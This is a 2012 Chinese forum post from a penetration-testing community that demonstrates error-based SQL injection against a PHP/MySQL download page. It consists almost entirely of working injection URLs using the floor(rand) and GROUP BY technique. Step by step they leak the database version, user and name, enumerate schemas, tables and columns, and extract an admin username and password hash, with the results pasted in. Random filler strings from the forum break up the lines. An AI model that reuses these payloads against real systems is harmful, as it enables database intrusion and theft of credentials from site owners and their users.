中国网络渗透测试联盟

标题: php+mysql高级爆错注入经测算有效 [打印本页]
作者: admin    时间: 2012-9-13 17:52
标题: php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-01666- W: x- i! T) B' i
. n, D8 t( X( W0 |
之前想找个测试 没想到这有 可以测试下做个记录而已
9 o. X4 U( u0 ~" I* t6 L2 {1 S; i: J# K
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003; A% {+ O0 C( S4 ?0 E9 j; T9 _
2 X5 R1 T* L- X7 E, d: i. H$ s. r
/data0/htdocs/leqi_new/app/myapp.php6 h6 O5 Q# ?3 R9 [+ `; {

$ p9 S( ?, L, V6 f) c 或者
/ x, x! }4 W# l  B
; l9 }$ z' _2 _! Z* b/**********version()**********/ 5.1.49-log
' b; e5 r# b/ \, G8 g  t* Ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
( v# H, Z5 h0 L
1 Q: s+ Z4 r. S7 X  V7 J4 F/**********user()**********/  6 e  R+ ~! n% K- j/ a, K
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
2 m/ Y' y# u' i7 d5 U5 T' y
- E4 i( a; w0 g0 E0 ]/**********database()**********/  leqi
) ^3 {% O6 z* }& chttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003$ H& a  u" e2 _( b& f, i
: H/ l- w; _* B7 F2 Y7 j
/**********limit依次递归爆库**********/
4 r1 ]  S  H& k% d6 dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) C1 Y  c' V% N# A- B
information_schema, R7 a- X$ Q+ c2 k* ]9 ~0 q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003: d; C. ^( Y& u; T
leqi
3 G& e; ]# ], c# g& yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0031 X) }  D1 i1 E9 v6 x
test4 K- @7 q) }" b2 B

# b4 T* L5 M1 r  t/**********limit依次递归爆表名**********/
4 y4 [" G8 P# q5 a8 e2 N3 G+ Uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% V) \7 n6 m7 i5 q$ K4 m/ [# ~
users! Z) x8 D; d6 K

4 N3 ]  Z: Z* E' S2 L0 W, X/**********limit依次递归爆字段名**********/
; k# u$ F& P7 ?: M" T6 s3 Phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 B& Q# C6 q+ d4 h) ruser_id,username,nickname,passwd,group_id
) _; G( Z4 d: f+ v# W8 Nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23" h( O8 F* E$ {4 f- t' A' L
/wapc/5000_0005_003& t) j/ v5 U" D" d; V
11 21
9 m; u: S- [# {4 k3 _http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23" ~" y" r& x7 ^, s) ~
/wapc/5000_0005_003) J- L3 v2 e* P9 q: I
11 341 351 361
& g9 e* p8 V8 u  V  T8 P/**********爆数据**********/2 |4 T8 B! J% H1 Q7 t. ?* Z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23+ {, ^7 i* r5 m! Q2 `  c
admin
6 K- Q/ T; S: U; yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
+ Q0 X3 A7 t# L8 m8 B6a8b4574ca231eb8bd52764d4978ffcd
" W$ d1 T8 e; q" Z" `& o) _1 x" S7 Z& r" m& k
+ I' B8 e% w! x; m9 m4 `; g: F& }9 I




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2